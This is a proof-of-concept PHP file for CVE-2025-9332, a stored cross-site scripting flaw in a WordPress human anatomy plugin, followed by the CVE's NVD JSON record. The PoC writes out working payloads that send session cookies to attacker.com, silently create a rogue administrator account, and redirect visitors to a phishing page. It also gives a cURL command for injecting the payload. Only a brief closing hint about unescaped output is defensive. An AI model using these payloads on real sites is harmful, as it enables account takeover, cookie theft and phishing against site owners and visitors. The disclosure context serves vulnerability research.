CVE-2025-9332

<?php /** * CVE-2025-9332 - Stored XSS PoC for WordPress Interactive Human Anatomy Plugin * * This PoC demonstrates how an authenticated administrator can inject * malicious JavaScript through the plugin's admin settings page. * * Note: Requires administrator-level access to exploit. */ // Step 1: Authenticate as administrator (already logged in via browser) // Step 2: Navigate to the plugin settings page // Step 3: Inject malicious payload into one of the settings fields // Example malicious payloads to inject into admin settings fields: // Payload 1: Cookie stealing $payload_1 = '<script>new Image().src="https://attacker.com/steal?c="+document.cookie;</script>'; // Payload 2: Create new admin account $payload_2 = '<script> var xhr = new XMLHttpRequest(); xhr.open("POST", "/wp-admin/user-new.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("action=createuser&_wpnonce_create-user=&user_login=hacker&[email protected]&pass1=Password123!&pass2=Password123!&role=administrator"); </script>'; // Payload 3: Defacement / Redirect $payload_3 = '<script>document.location="https://attacker.com/phishing";</script>'; // Step 4: Submit the form - payload is stored in database // Step 5: When any user visits the page with the plugin, payload executes // Automated exploitation example using cURL (requires valid admin cookies): /* curl -X POST "https://target.com/wp-admin/admin.php?page=interactive-medical-drawing" \ -b "wordpress_logged_in_cookie=YOUR_COOKIE" \ -d "setting_field=<script>alert('XSS')</script>&submit=Save" */ // Detection: Search for unescaped output in plugin source code echo "Look for patterns like: echo $user_input; or print($user_input);\n"; echo "Without proper escaping functions like esc_html(), esc_attr(), esc_url()\n"; ?>

{"cve": {"id": "CVE-2025-9332", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:47.933", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Interactive Human Anatomy with Clickable Body Parts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wordpress.org/plugins/interactive-medical-drawing-of-human-body/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/445e762c-7e90-4994-8542-31a84bc91388?source=cve", "source": "[email protected]"}]}}